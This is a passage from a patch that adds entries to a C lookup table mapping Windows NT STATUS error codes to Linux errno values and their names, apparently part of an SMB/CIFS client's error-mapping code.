++	{STATUS_LOST_WRITEBEHIND_DATA, -EIO, "STATUS_LOST_WRITEBEHIND_DATA"},
++	{STATUS_CLIENT_SERVER_PARAMETERS_INVALID, -EIO,
++	"STATUS_CLIENT_SERVER_PARAMETERS_INVALID"},
++	{STATUS_PASSWORD_MUST_CHANGE, -EIO, "STATUS_PASSWORD_MUST_CHANGE"},
++	{STATUS_NOT_FOUND, -ENOENT, "STATUS_NOT_FOUND"},
++	{STATUS_NOT_TINY_STREAM, -EIO, "STATUS_NOT_TINY_STREAM"},
++	{STATUS_RECOVERY_FAILURE, -EIO, "STATUS_RECOVERY_FAILURE"},
++	{STATUS_STACK_OVERFLOW_READ, -EIO, "STATUS_STACK_OVERFLOW_READ"},
++	{STATUS_FAIL_CHECK, -EIO, "STATUS_FAIL_CHECK"},
++	{STATUS_DUPLICATE_OBJECTID, -EIO, "STATUS_DUPLICATE_OBJECTID"},
++	{STATUS_OBJECTID_EXISTS, -EIO, "STATUS_OBJECTID_EXISTS"},
++	{STATUS_CONVERT_TO_LARGE, -EIO, "STATUS_CONVERT_TO_LARGE"},
++	{STATUS_RETRY, -EAGAIN, "STATUS_RETRY"},
++	{STATUS_FOUND_OUT_OF_SCOPE, -EIO, "STATUS_FOUND_OUT_OF_SCOPE"},
++	{STATUS_ALLOCATE_BUCKET, -EIO, "STATUS_ALLOCATE_BUCKET"},
++	{STATUS_PROPSET_NOT_FOUND, -EIO, "STATUS_PROPSET_NOT_FOUND"},
++	{STATUS_MARSHALL_OVERFLOW, -EIO, "STATUS_MARSHALL_OVERFLOW"},
++	{STATUS_INVALID_VARIANT, -EIO, "STATUS_INVALID_VARIANT"},
++	{STATUS_DOMAIN_CONTROLLER_NOT_FOUND, -EIO,
++	"STATUS_DOMAIN_CONTROLLER_NOT_FOUND"},
++	{STATUS_ACCOUNT_LOCKED_OUT, -EACCES, "STATUS_ACCOUNT_LOCKED_OUT"},
++	{STATUS_HANDLE_NOT_CLOSABLE, -EIO, "STATUS_HANDLE_NOT_CLOSABLE"},
++	{STATUS_CONNECTION_REFUSED, -EIO, "STATUS_CONNECTION_REFUSED"},
++	{STATUS_GRACEFUL_DISCONNECT, -EIO, "STATUS_GRACEFUL_DISCONNECT"},
++	{STATUS_ADDRESS_ALREADY_ASSOCIATED, -EIO,
++	"STATUS_ADDRESS_ALREADY_ASSOCIATED"},
++	{STATUS_ADDRESS_NOT_ASSOCIATED, -EIO, "STATUS_ADDRESS_NOT_ASSOCIATED"},
++	{STATUS_CONNECTION_INVALID, -EIO, "STATUS_CONNECTION_INVALID"},
++	{STATUS_CONNECTION_ACTIVE, -EIO, "STATUS_CONNECTION_ACTIVE"},
++	{STATUS_NETWORK_UNREACHABLE, -ENETUNREACH,
++	"STATUS_NETWORK_UNREACHABLE"},
++	{STATUS_HOST_UNREACHABLE, -EHOSTDOWN, "STATUS_HOST_UNREACHABLE"},
++	{STATUS_PROTOCOL_UNREACHABLE, -ENETUNREACH,
++	"STATUS_PROTOCOL_UNREACHABLE"},
++	{STATUS_PORT_UNREACHABLE, -ENETUNREACH, "STATUS_PORT_UNREACHABLE"},
++	{STATUS_REQUEST_ABORTED, -EIO, "STATUS_REQUEST_ABORTED"},
++	{STATUS_CONNECTION_ABORTED, -ECONNABORTED, "STATUS_CONNECTION_ABORTED"},
++	{STATUS_BAD_COMPRESSION_BUFFER, -EIO, "STATUS_BAD_COMPRESSION_BUFFER"},
++	{STATUS_USER_MAPPED_FILE, -EIO, "STATUS_USER_MAPPED_FILE"},
++	{STATUS_AUDIT_FAILED, -EIO, "STATUS_AUDIT_FAILED"},
++	{STATUS_TIMER_RESOLUTION_NOT_SET, -EIO,
++	"STATUS_TIMER_RESOLUTION_NOT_SET"},
++	{STATUS_CONNECTION_COUNT_LIMIT, -EIO, "STATUS_CONNECTION_COUNT_LIMIT"},
++	{STATUS_LOGIN_TIME_RESTRICTION, -EACCES,
++	"STATUS_LOGIN_TIME_RESTRICTION"},
++	{STATUS_LOGIN_WKSTA_RESTRICTION, -EACCES,
++	"STATUS_LOGIN_WKSTA_RESTRICTION"},
++	{STATUS_IMAGE_MP_UP_MISMATCH, -EIO, "STATUS_IMAGE_MP_UP_MISMATCH"},
++	{STATUS_INSUFFICIENT_LOGON_INFO, -EIO,
++	"STATUS_INSUFFICIENT_LOGON_INFO"},
++	{STATUS_BAD_DLL_ENTRYPOINT, -EIO, "STATUS_BAD_DLL_ENTRYPOINT"},
++	{STATUS_BAD_SERVICE_ENTRYPOINT, -EIO, "STATUS_BAD_SERVICE_ENTRYPOINT"},
++	{STATUS_LPC_REPLY_LOST, -EIO, "STATUS_LPC_REPLY_LOST"},
++	{STATUS_IP_ADDRESS_CONFLICT1, -EIO, "STATUS_IP_ADDRESS_CONFLICT1"},
++	{STATUS_IP_ADDRESS_CONFLICT2, -EIO, "STATUS_IP_ADDRESS_CONFLICT2"},
++	{STATUS_REGISTRY_QUOTA_LIMIT, -EDQUOT, "STATUS_REGISTRY_QUOTA_LIMIT"},
++	{STATUS_PATH_NOT_COVERED, -EREMOTE, "STATUS_PATH_NOT_COVERED"},
++	{STATUS_NO_CALLBACK_ACTIVE, -EIO, "STATUS_NO_CALLBACK_ACTIVE"},
++	{STATUS_LICENSE_QUOTA_EXCEEDED, -EACCES,
++	"STATUS_LICENSE_QUOTA_EXCEEDED"},
++	{STATUS_PWD_TOO_SHORT, -EIO, "STATUS_PWD_TOO_SHORT"},
++	{STATUS_PWD_TOO_RECENT, -EIO, "STATUS_PWD_TOO_RECENT"},
++	{STATUS_PWD_HISTORY_CONFLICT, -EIO, "STATUS_PWD_HISTORY_CONFLICT"},
++	{STATUS_PLUGPLAY_NO_DEVICE, -EIO, "STATUS_PLUGPLAY_NO_DEVICE"},
++	{STATUS_UNSUPPORTED_COMPRESSION, -EIO,
++	"STATUS_UNSUPPORTED_COMPRESSION"},
++	{STATUS_INVALID_HW_PROFILE, -EIO, "STATUS_INVALID_HW_PROFILE"},
++	{STATUS_INVALID_PLUGPLAY_DEVICE_PATH, -EIO,
++	"STATUS_INVALID_PLUGPLAY_DEVICE_PATH"},
++	{STATUS_DRIVER_ORDINAL_NOT_FOUND, -EIO,
++	"STATUS_DRIVER_ORDINAL_NOT_FOUND"},
++	{STATUS_DRIVER_ENTRYPOINT_NOT_FOUND, -EIO,
++	"STATUS_DRIVER_ENTRYPOINT_NOT_FOUND"},
++	{STATUS_RESOURCE_NOT_OWNED, -EIO, "STATUS_RESOURCE_NOT_OWNED"},
++	{STATUS_TOO_MANY_LINKS, -EMLINK, "STATUS_TOO_MANY_LINKS"},
++	{STATUS_QUOTA_LIST_INCONSISTENT, -EIO,
++	"STATUS_QUOTA_LIST_INCONSISTENT"},
++	{STATUS_FILE_IS_OFFLINE, -EIO, "STATUS_FILE_IS_OFFLINE"},
++	{STATUS_EVALUATION_EXPIRATION, -EIO, "STATUS_EVALUATION_EXPIRATION"},
++	{STATUS_ILLEGAL_DLL_RELOCATION, -EIO, "STATUS_ILLEGAL_DLL_RELOCATION"},
++	{STATUS_LICENSE_VIOLATION, -EIO, "STATUS_LICENSE_VIOLATION"},
++	{STATUS_DLL_INIT_FAILED_LOGOFF, -EIO, "STATUS_DLL_INIT_FAILED_LOGOFF"},
++	{STATUS_DRIVER_UNABLE_TO_LOAD, -EIO, "STATUS_DRIVER_UNABLE_TO_LOAD"},
++	{STATUS_DFS_UNAVAILABLE, -EIO, "STATUS_DFS_UNAVAILABLE"},
++	{STATUS_VOLUME_DISMOUNTED, -EIO, "STATUS_VOLUME_DISMOUNTED"},
++	{STATUS_WX86_INTERNAL_ERROR, -EIO, "STATUS_WX86_INTERNAL_ERROR"},
++	{STATUS_WX86_FLOAT_STACK_CHECK, -EIO, "STATUS_WX86_FLOAT_STACK_CHECK"},
++	{STATUS_VALIDATE_CONTINUE, -EIO, "STATUS_VALIDATE_CONTINUE"},
++	{STATUS_NO_MATCH, -EIO, "STATUS_NO_MATCH"},
++	{STATUS_NO_MORE_MATCHES, -EIO, "STATUS_NO_MORE_MATCHES"},
++	{STATUS_NOT_A_REPARSE_POINT, -EIO, "STATUS_NOT_A_REPARSE_POINT"},
++	{STATUS_IO_REPARSE_TAG_INVALID, -EIO, "STATUS_IO_REPARSE_TAG_INVALID"},
++	{STATUS_IO_REPARSE_TAG_MISMATCH, -EIO,
++	"STATUS_IO_REPARSE_TAG_MISMATCH"},
++	{STATUS_IO_REPARSE_DATA_INVALID, -EIO,
++	"STATUS_IO_REPARSE_DATA_INVALID"},
++	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EIO,
++	"STATUS_IO_REPARSE_TAG_NOT_HANDLED"},
++	{STATUS_REPARSE_POINT_NOT_RESOLVED, -EIO,
++	"STATUS_REPARSE_POINT_NOT_RESOLVED"},
++	{STATUS_DIRECTORY_IS_A_REPARSE_POINT, -EIO,
++	"STATUS_DIRECTORY_IS_A_REPARSE_POINT"},
++	{STATUS_RANGE_LIST_CONFLICT, -EIO, "STATUS_RANGE_LIST_CONFLICT"},
++	{STATUS_SOURCE_ELEMENT_EMPTY, -EIO, "STATUS_SOURCE_ELEMENT_EMPTY"},
++	{STATUS_DESTINATION_ELEMENT_FULL, -EIO,
++	"STATUS_DESTINATION_ELEMENT_FULL"},
++	{STATUS_ILLEGAL_ELEMENT_ADDRESS, -EIO,
++	"STATUS_ILLEGAL_ELEMENT_ADDRESS"},
++	{STATUS_MAGAZINE_NOT_PRESENT, -EIO, "STATUS_MAGAZINE_NOT_PRESENT"},
++	{STATUS_REINITIALIZATION_NEEDED, -EIO,
++	"STATUS_REINITIALIZATION_NEEDED"},
++	{STATUS_ENCRYPTION_FAILED, -EIO, "STATUS_ENCRYPTION_FAILED"},
++	{STATUS_DECRYPTION_FAILED, -EIO, "STATUS_DECRYPTION_FAILED"},
++	{STATUS_RANGE_NOT_FOUND, -EIO, "STATUS_RANGE_NOT_FOUND"},
++	{STATUS_NO_RECOVERY_POLICY, -EIO, "STATUS_NO_RECOVERY_POLICY"},
++	{STATUS_NO_EFS, -EIO, "STATUS_NO_EFS"},
++	{STATUS_WRONG_EFS, -EIO, "STATUS_WRONG_EFS"},
++	{STATUS_NO_USER_KEYS, -EIO, "STATUS_NO_USER_KEYS"},
++	{STATUS_FILE_NOT_ENCRYPTED, -EIO, "STATUS_FILE_NOT_ENCRYPTED"},
++	{STATUS_NOT_EXPORT_FORMAT, -EIO, "STATUS_NOT_EXPORT_FORMAT"},
++	{STATUS_FILE_ENCRYPTED, -EIO, "STATUS_FILE_ENCRYPTED"},
++	{STATUS_WMI_GUID_NOT_FOUND, -EIO, "STATUS_WMI_GUID_NOT_FOUND"},
++	{STATUS_WMI_INSTANCE_NOT_FOUND, -EIO, "STATUS_WMI_INSTANCE_NOT_FOUND"},
++	{STATUS_WMI_ITEMID_NOT_FOUND, -EIO, "STATUS_WMI_ITEMID_NOT_FOUND"},
++	{STATUS_WMI_TRY_AGAIN, -EIO, "STATUS_WMI_TRY_AGAIN"},
++	{STATUS_SHARED_POLICY, -EIO, "STATUS_SHARED_POLICY"},
++	{STATUS_POLICY_OBJECT_NOT_FOUND, -EIO,
++	"STATUS_POLICY_OBJECT_NOT_FOUND"},
++	{STATUS_POLICY_ONLY_IN_DS, -EIO, "STATUS_POLICY_ONLY_IN_DS"},
++	{STATUS_VOLUME_NOT_UPGRADED, -EIO, "STATUS_VOLUME_NOT_UPGRADED"},
++	{STATUS_REMOTE_STORAGE_NOT_ACTIVE, -EIO,
++	"STATUS_REMOTE_STORAGE_NOT_ACTIVE"},
++	{STATUS_REMOTE_STORAGE_MEDIA_ERROR, -EIO,
++	"STATUS_REMOTE_STORAGE_MEDIA_ERROR"},
++	{STATUS_NO_TRACKING_SERVICE, -EIO, "STATUS_NO_TRACKING_SERVICE"},
++	{STATUS_SERVER_SID_MISMATCH, -EIO, "STATUS_SERVER_SID_MISMATCH"},
++	{STATUS_DS_NO_ATTRIBUTE_OR_VALUE, -EIO,
++	"STATUS_DS_NO_ATTRIBUTE_OR_VALUE"},
++	{STATUS_DS_INVALID_ATTRIBUTE_SYNTAX, -EIO,
++	"STATUS_DS_INVALID_ATTRIBUTE_SYNTAX"},
++	{STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED, -EIO,
++	"STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED"},
++	{STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS, -EIO,
++	"STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS"},
++	{STATUS_DS_BUSY, -EBUSY, "STATUS_DS_BUSY"},
++	{STATUS_DS_UNAVAILABLE, -EIO, "STATUS_DS_UNAVAILABLE"},
++	{STATUS_DS_NO_RIDS_ALLOCATED, -EIO, "STATUS_DS_NO_RIDS_ALLOCATED"},
++	{STATUS_DS_NO_MORE_RIDS, -EIO, "STATUS_DS_NO_MORE_RIDS"},
++	{STATUS_DS_INCORRECT_ROLE_OWNER, -EIO,
++	"STATUS_DS_INCORRECT_ROLE_OWNER"},
++	{STATUS_DS_RIDMGR_INIT_ERROR, -EIO, "STATUS_DS_RIDMGR_INIT_ERROR"},
++	{STATUS_DS_OBJ_CLASS_VIOLATION, -EIO, "STATUS_DS_OBJ_CLASS_VIOLATION"},
++	{STATUS_DS_CANT_ON_NON_LEAF, -EIO, "STATUS_DS_CANT_ON_NON_LEAF"},
++	{STATUS_DS_CANT_ON_RDN, -EIO, "STATUS_DS_CANT_ON_RDN"},
++	{STATUS_DS_CANT_MOD_OBJ_CLASS, -EIO, "STATUS_DS_CANT_MOD_OBJ_CLASS"},
++	{STATUS_DS_CROSS_DOM_MOVE_FAILED, -EIO,
++	"STATUS_DS_CROSS_DOM_MOVE_FAILED"},
++	{STATUS_DS_GC_NOT_AVAILABLE, -EIO, "STATUS_DS_GC_NOT_AVAILABLE"},
++	{STATUS_DIRECTORY_SERVICE_REQUIRED, -EIO,
++	"STATUS_DIRECTORY_SERVICE_REQUIRED"},
++	{STATUS_REPARSE_ATTRIBUTE_CONFLICT, -EIO,
++	"STATUS_REPARSE_ATTRIBUTE_CONFLICT"},
++	{STATUS_CANT_ENABLE_DENY_ONLY, -EIO, "STATUS_CANT_ENABLE_DENY_ONLY"},
++	{STATUS_FLOAT_MULTIPLE_FAULTS, -EIO, "STATUS_FLOAT_MULTIPLE_FAULTS"},
++	{STATUS_FLOAT_MULTIPLE_TRAPS, -EIO, "STATUS_FLOAT_MULTIPLE_TRAPS"},
++	{STATUS_DEVICE_REMOVED, -EIO, "STATUS_DEVICE_REMOVED"},
++	{STATUS_JOURNAL_DELETE_IN_PROGRESS, -EIO,
++	"STATUS_JOURNAL_DELETE_IN_PROGRESS"},
++	{STATUS_JOURNAL_NOT_ACTIVE, -EIO, "STATUS_JOURNAL_NOT_ACTIVE"},
++	{STATUS_NOINTERFACE, -EIO, "STATUS_NOINTERFACE"},
++	{STATUS_DS_ADMIN_LIMIT_EXCEEDED, -EIO,
++	"STATUS_DS_ADMIN_LIMIT_EXCEEDED"},
++	{STATUS_DRIVER_FAILED_SLEEP, -EIO, "STATUS_DRIVER_FAILED_SLEEP"},
++	{STATUS_MUTUAL_AUTHENTICATION_FAILED, -EIO,
++	"STATUS_MUTUAL_AUTHENTICATION_FAILED"},
++	{STATUS_CORRUPT_SYSTEM_FILE, -EIO, "STATUS_CORRUPT_SYSTEM_FILE"},
++	{STATUS_DATATYPE_MISALIGNMENT_ERROR, -EIO,
++	"STATUS_DATATYPE_MISALIGNMENT_ERROR"},
++	{STATUS_WMI_READ_ONLY, -EROFS, "STATUS_WMI_READ_ONLY"},
++	{STATUS_WMI_SET_FAILURE, -EIO, "STATUS_WMI_SET_FAILURE"},
++	{STATUS_COMMITMENT_MINIMUM, -EIO, "STATUS_COMMITMENT_MINIMUM"},
++	{STATUS_REG_NAT_CONSUMPTION, -EIO, "STATUS_REG_NAT_CONSUMPTION"},
++	{STATUS_TRANSPORT_FULL, -EIO, "STATUS_TRANSPORT_FULL"},
++	{STATUS_DS_SAM_INIT_FAILURE, -EIO, "STATUS_DS_SAM_INIT_FAILURE"},
++	{STATUS_ONLY_IF_CONNECTED, -EIO, "STATUS_ONLY_IF_CONNECTED"},
++	{STATUS_DS_SENSITIVE_GROUP_VIOLATION, -EIO,
++	"STATUS_DS_SENSITIVE_GROUP_VIOLATION"},
++	{STATUS_PNP_RESTART_ENUMERATION, -EIO,
++	"STATUS_PNP_RESTART_ENUMERATION"},
++	{STATUS_JOURNAL_ENTRY_DELETED, -EIO, "STATUS_JOURNAL_ENTRY_DELETED"},
++	{STATUS_DS_CANT_MOD_PRIMARYGROUPID, -EIO,
++	"STATUS_DS_CANT_MOD_PRIMARYGROUPID"},
++	{STATUS_SYSTEM_IMAGE_BAD_SIGNATURE, -EIO,
++	"STATUS_SYSTEM_IMAGE_BAD_SIGNATURE"},
++	{STATUS_PNP_REBOOT_REQUIRED, -EIO, "STATUS_PNP_REBOOT_REQUIRED"},
++	{STATUS_POWER_STATE_INVALID, -EIO, "STATUS_POWER_STATE_INVALID"},
++	{STATUS_DS_INVALID_GROUP_TYPE, -EIO, "STATUS_DS_INVALID_GROUP_TYPE"},
++	{STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN, -EIO,
++	"STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN"},
++	{STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN, -EIO,
++	"STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER"},
++	{STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER"},
++	{STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER"},
++	{STATUS_DS_HAVE_PRIMARY_MEMBERS, -EIO,
++	"STATUS_DS_HAVE_PRIMARY_MEMBERS"},
++	{STATUS_WMI_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_WMI_NOT_SUPPORTED"},
++	{STATUS_INSUFFICIENT_POWER, -EIO, "STATUS_INSUFFICIENT_POWER"},
++	{STATUS_SAM_NEED_BOOTKEY_PASSWORD, -EIO,
++	"STATUS_SAM_NEED_BOOTKEY_PASSWORD"},
++	{STATUS_SAM_NEED_BOOTKEY_FLOPPY, -EIO,
++	"STATUS_SAM_NEED_BOOTKEY_FLOPPY"},
++	{STATUS_DS_CANT_START, -EIO, "STATUS_DS_CANT_START"},
++	{STATUS_DS_INIT_FAILURE, -EIO, "STATUS_DS_INIT_FAILURE"},
++	{STATUS_SAM_INIT_FAILURE, -EIO, "STATUS_SAM_INIT_FAILURE"},
++	{STATUS_DS_GC_REQUIRED, -EIO, "STATUS_DS_GC_REQUIRED"},
++	{STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY, -EIO,
++	"STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY"},
++	{STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS, -EIO,
++	"STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS"},
++	{STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED"},
++	{STATUS_MULTIPLE_FAULT_VIOLATION, -EIO,
++	"STATUS_MULTIPLE_FAULT_VIOLATION"},
++	{STATUS_CURRENT_DOMAIN_NOT_ALLOWED, -EIO,
++	"STATUS_CURRENT_DOMAIN_NOT_ALLOWED"},
++	{STATUS_CANNOT_MAKE, -EIO, "STATUS_CANNOT_MAKE"},
++	{STATUS_SYSTEM_SHUTDOWN, -EIO, "STATUS_SYSTEM_SHUTDOWN"},
++	{STATUS_DS_INIT_FAILURE_CONSOLE, -EIO,
++	"STATUS_DS_INIT_FAILURE_CONSOLE"},
++	{STATUS_DS_SAM_INIT_FAILURE_CONSOLE, -EIO,
++	"STATUS_DS_SAM_INIT_FAILURE_CONSOLE"},
++	{STATUS_UNFINISHED_CONTEXT_DELETED, -EIO,
++	"STATUS_UNFINISHED_CONTEXT_DELETED"},
++	{STATUS_NO_TGT_REPLY, -EIO, "STATUS_NO_TGT_REPLY"},
++	/* Note that ENOATTR and ENODATA are the same errno */
++	{STATUS_OBJECTID_NOT_FOUND, -ENODATA, "STATUS_OBJECTID_NOT_FOUND"},
++	{STATUS_NO_IP_ADDRESSES, -EIO, "STATUS_NO_IP_ADDRESSES"},
++	{STATUS_WRONG_CREDENTIAL_HANDLE, -EIO,
++	"STATUS_WRONG_CREDENTIAL_HANDLE"},
++	{STATUS_CRYPTO_SYSTEM_INVALID, -EIO, "STATUS_CRYPTO_SYSTEM_INVALID"},
++	{STATUS_MAX_REFERRALS_EXCEEDED, -EIO, "STATUS_MAX_REFERRALS_EXCEEDED"},
++	{STATUS_MUST_BE_KDC, -EIO, "STATUS_MUST_BE_KDC"},
++	{STATUS_STRONG_CRYPTO_NOT_SUPPORTED, -EIO,
++	"STATUS_STRONG_CRYPTO_NOT_SUPPORTED"},
++	{STATUS_TOO_MANY_PRINCIPALS, -EIO, "STATUS_TOO_MANY_PRINCIPALS"},
++	{STATUS_NO_PA_DATA, -EIO, "STATUS_NO_PA_DATA"},
++	{STATUS_PKINIT_NAME_MISMATCH, -EIO, "STATUS_PKINIT_NAME_MISMATCH"},
++	{STATUS_SMARTCARD_LOGON_REQUIRED, -EIO,
++	"STATUS_SMARTCARD_LOGON_REQUIRED"},
++	{STATUS_KDC_INVALID_REQUEST, -EIO, "STATUS_KDC_INVALID_REQUEST"},
++	{STATUS_KDC_UNABLE_TO_REFER, -EIO, "STATUS_KDC_UNABLE_TO_REFER"},
++	{STATUS_KDC_UNKNOWN_ETYPE, -EIO, "STATUS_KDC_UNKNOWN_ETYPE"},
++	{STATUS_SHUTDOWN_IN_PROGRESS, -EIO, "STATUS_SHUTDOWN_IN_PROGRESS"},
++	{STATUS_SERVER_SHUTDOWN_IN_PROGRESS, -EIO,
++	"STATUS_SERVER_SHUTDOWN_IN_PROGRESS"},
++	{STATUS_NOT_SUPPORTED_ON_SBS, -EOPNOTSUPP,
++	"STATUS_NOT_SUPPORTED_ON_SBS"},
++	{STATUS_WMI_GUID_DISCONNECTED, -EIO, "STATUS_WMI_GUID_DISCONNECTED"},
++	{STATUS_WMI_ALREADY_DISABLED, -EIO, "STATUS_WMI_ALREADY_DISABLED"},
++	{STATUS_WMI_ALREADY_ENABLED, -EIO, "STATUS_WMI_ALREADY_ENABLED"},
++	{STATUS_MFT_TOO_FRAGMENTED, -EIO, "STATUS_MFT_TOO_FRAGMENTED"},
++	{STATUS_COPY_PROTECTION_FAILURE, -EIO,
++	"STATUS_COPY_PROTECTION_FAILURE"},
++	{STATUS_CSS_AUTHENTICATION_FAILURE, -EIO,
++	"STATUS_CSS_AUTHENTICATION_FAILURE"},
++	{STATUS_CSS_KEY_NOT_PRESENT, -EIO, "STATUS_CSS_KEY_NOT_PRESENT"},
++	{STATUS_CSS_KEY_NOT_ESTABLISHED, -EIO,
++	"STATUS_CSS_KEY_NOT_ESTABLISHED"},
++	{STATUS_CSS_SCRAMBLED_SECTOR, -EIO, "STATUS_CSS_SCRAMBLED_SECTOR"},
++	{STATUS_CSS_REGION_MISMATCH, -EIO, "STATUS_CSS_REGION_MISMATCH"},
++	{STATUS_CSS_RESETS_EXHAUSTED, -EIO, "STATUS_CSS_RESETS_EXHAUSTED"},
++	{STATUS_PKINIT_FAILURE, -EIO, "STATUS_PKINIT_FAILURE"},
++	{STATUS_SMARTCARD_SUBSYSTEM_FAILURE, -EIO,
++	"STATUS_SMARTCARD_SUBSYSTEM_FAILURE"},
++	{STATUS_NO_KERB_KEY, -EIO, "STATUS_NO_KERB_KEY"},
++	{STATUS_HOST_DOWN, -EIO, "STATUS_HOST_DOWN"},
++	{STATUS_UNSUPPORTED_PREAUTH, -EIO, "STATUS_UNSUPPORTED_PREAUTH"},
++	{STATUS_EFS_ALG_BLOB_TOO_BIG, -EIO, "STATUS_EFS_ALG_BLOB_TOO_BIG"},
++	{STATUS_PORT_NOT_SET, -EIO, "STATUS_PORT_NOT_SET"},
++	{STATUS_DEBUGGER_INACTIVE, -EIO, "STATUS_DEBUGGER_INACTIVE"},
++	{STATUS_DS_VERSION_CHECK_FAILURE, -EIO,
++	"STATUS_DS_VERSION_CHECK_FAILURE"},
++	{STATUS_AUDITING_DISABLED, -EIO, "STATUS_AUDITING_DISABLED"},
++	{STATUS_PRENT4_MACHINE_ACCOUNT, -EIO, "STATUS_PRENT4_MACHINE_ACCOUNT"},
++	{STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
++	"STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER"},
++	{STATUS_INVALID_IMAGE_WIN_32, -EIO, "STATUS_INVALID_IMAGE_WIN_32"},
++	{STATUS_INVALID_IMAGE_WIN_64, -EIO, "STATUS_INVALID_IMAGE_WIN_64"},
++	{STATUS_BAD_BINDINGS, -EIO, "STATUS_BAD_BINDINGS"},
++	{STATUS_NETWORK_SESSION_EXPIRED, -EIO,
++	"STATUS_NETWORK_SESSION_EXPIRED"},
++	{STATUS_APPHELP_BLOCK, -EIO, "STATUS_APPHELP_BLOCK"},
++	{STATUS_ALL_SIDS_FILTERED, -EIO, "STATUS_ALL_SIDS_FILTERED"},
++	{STATUS_NOT_SAFE_MODE_DRIVER, -EIO, "STATUS_NOT_SAFE_MODE_DRIVER"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_PATH, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_PATH"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_OTHER, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_OTHER"},
++	{STATUS_FAILED_DRIVER_ENTRY, -EIO, "STATUS_FAILED_DRIVER_ENTRY"},
++	{STATUS_DEVICE_ENUMERATION_ERROR, -EIO,
++	"STATUS_DEVICE_ENUMERATION_ERROR"},
++	{STATUS_MOUNT_POINT_NOT_RESOLVED, -EIO,
++	"STATUS_MOUNT_POINT_NOT_RESOLVED"},
++	{STATUS_INVALID_DEVICE_OBJECT_PARAMETER, -EIO,
++	"STATUS_INVALID_DEVICE_OBJECT_PARAMETER"},
++	{STATUS_MCA_OCCURED, -EIO, "STATUS_MCA_OCCURED"},
++	{STATUS_DRIVER_BLOCKED_CRITICAL, -EIO,
++	"STATUS_DRIVER_BLOCKED_CRITICAL"},
++	{STATUS_DRIVER_BLOCKED, -EIO, "STATUS_DRIVER_BLOCKED"},
++	{STATUS_DRIVER_DATABASE_ERROR, -EIO, "STATUS_DRIVER_DATABASE_ERROR"},
++	{STATUS_SYSTEM_HIVE_TOO_LARGE, -EIO, "STATUS_SYSTEM_HIVE_TOO_LARGE"},
++	{STATUS_INVALID_IMPORT_OF_NON_DLL, -EIO,
++	"STATUS_INVALID_IMPORT_OF_NON_DLL"},
++	{STATUS_NO_SECRETS, -EIO, "STATUS_NO_SECRETS"},
++	{STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, -EACCES,
++	"STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY"},
++	{STATUS_FAILED_STACK_SWITCH, -EIO, "STATUS_FAILED_STACK_SWITCH"},
++	{STATUS_HEAP_CORRUPTION, -EIO, "STATUS_HEAP_CORRUPTION"},
++	{STATUS_SMARTCARD_WRONG_PIN, -EIO, "STATUS_SMARTCARD_WRONG_PIN"},
++	{STATUS_SMARTCARD_CARD_BLOCKED, -EIO, "STATUS_SMARTCARD_CARD_BLOCKED"},
++	{STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED, -EIO,
++	"STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED"},
++	{STATUS_SMARTCARD_NO_CARD, -EIO, "STATUS_SMARTCARD_NO_CARD"},
++	{STATUS_SMARTCARD_NO_KEY_CONTAINER, -EIO,
++	"STATUS_SMARTCARD_NO_KEY_CONTAINER"},
++	{STATUS_SMARTCARD_NO_CERTIFICATE, -EIO,
++	"STATUS_SMARTCARD_NO_CERTIFICATE"},
++	{STATUS_SMARTCARD_NO_KEYSET, -EIO, "STATUS_SMARTCARD_NO_KEYSET"},
++	{STATUS_SMARTCARD_IO_ERROR, -EIO, "STATUS_SMARTCARD_IO_ERROR"},
++	{STATUS_DOWNGRADE_DETECTED, -EIO, "STATUS_DOWNGRADE_DETECTED"},
++	{STATUS_SMARTCARD_CERT_REVOKED, -EIO, "STATUS_SMARTCARD_CERT_REVOKED"},
++	{STATUS_ISSUING_CA_UNTRUSTED, -EIO, "STATUS_ISSUING_CA_UNTRUSTED"},
